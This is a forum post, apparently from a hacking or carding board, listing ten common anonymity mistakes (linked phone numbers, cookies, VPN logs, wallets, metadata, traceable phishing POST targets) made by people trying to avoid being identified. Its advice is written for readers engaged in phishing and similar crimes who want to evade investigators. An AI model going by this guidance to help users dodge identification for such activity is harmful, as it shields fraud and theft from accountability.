Fixxx
Moder
- Joined
- 20.08.24
- Messages
- 702
- Reaction score
- 2,365
- Points
- 93
Many people who ask such questions are too focused on changing their IP and completely forget about much more important things. From personal experience, I know of a case where a fairly experienced hacker used VPNs, disposable emails and threw money through a chain of payment systems. He was trying hard enough, but he got caught. The point is not that you shouldn't try to hide your IP address - the point is that it's absolutely pointless if you don't understand other aspects of anonymity.
1. Anonymity in social networks
If you registered in Facebook, indicating your phone number and after connecting via Tor...
Does this mean you are anonymous - because you used Tor?
No, it doesn't. If only because you have a real phone number attached to your account. Accordingly, an IP address is not particularly necessary for your identification.2. Anonymity and cookies
Cookies are small pieces of information that are stored in your web browser after a website has sent them to you.
If you visit a website, receive your cookies, then reconnect via Tor and write something in the comments, the cookie can link the author of the comment and the user who previously visited with a different IP address.
Cookies are designed to identify a user independently of your IP address.3. Many sites store the IP of previous activities
For example, you have registered a VPN account to which you will connect via Tor. But you registered it from your IP.
Will you be anonymous if you connect to a VPN through Tor?
No, because information about previous operations with your IP address has already been stored.4. I will buy a VPN (or a VPS server to set up OpenVPN) and be anonymous
Even if you read the third point and go to register via Tor, but at the same time use wallets that can lead to you, there is no question of anonymity.
And when buying disposable SIM cards and entering the sites of wallets, you should also remember about your anonymity, otherwise it's all just pointless.5. OpenVPN is good, but not for anonymity
If you think about the original purpose of VPN networks, it turns out that virtual private networks, within which computers scattered around the world, can access each other's local network resources. In this case, the traffic exchange is encrypted, but this traffic is encrypted only for an external observer, but not for the server and clients of the OpenVPN network. For this reason, if you have purchased a free or paid VPN account, be prepared that the server owner can do whatever he wants with your traffic and keeps activity logs - what requests were made from which client. It's impossible to say how many of them are “honeypots” and record activity, but in my opinion, 100% of paid and free VPN providers do this.
If you want to use a VPN - use one, but your own.
6. There are many ways to find out your real IP address
There are a lot of options. From the simplest - send a link to a controlled site and see the IP (if communicating through an anonymous messenger) or a file with a trojan to quite sophisticated ways.
7. If you use any closed-source software, there is a backdoor installed there
Backdoors can be in legitimate closed-source software as well - as a hard-to-detect vulnerability that the vendor knows about, or just a regular dumb-as-a-cork backdoor - such backdoors have been found, for example, in official router firmware. As for illegal closed-source software that is distributed anonymously, please tell me, why not install a backdoor? The owner won't find out - and even if he does, what will he do? He will go to the police and say: I bought scripts for cracking the security of stolen phones and they installed a virus there... I doubt he will do that.
8. Lack of understanding of the simplest technical aspects of networks, servers, applications, etc.
Phishing sites of some uneducated "hackers" can be easily found simply by analyzing where the POST request goes.
Why did the "hacker" leave the archived scripts on this site? Apparently, he just didn't know that it is very easy to track where the POST request goes even if the HTML code is obfuscated.
And there can be many such "technical" blunders: a simple SSH connection password, misunderstanding what information on the server a researcher can access, misunderstanding what Cloudflare is for, etc.
9. Big picture
Example: infrastructure is attacked and IP traces and other indirect signs lead somewhere far away. But at the same time, the objects and methods of attack are similar to those used by a known hacker group.
At the very least, there is reason to wonder.10. Metadata in files
You should know all about metadata and programs for viewing and cleaning it.
Otherwise, if you are distributing files, all other measures of anonymity may be useless. This is similar to the first point, where you use Tor but log in to a social network using your own account.What should I do to make sure I won't be found?
The only 100% guarantee is only the fact that you will not be found.... Even if you have studied the "anonymity manuals" from cover to cover, even if it's written by an understanding person and even if you have done everything correctly, but don't understand the other aspects discussed above, your chances of getting "burned" by one of the idiotic methods discussed above are quite high.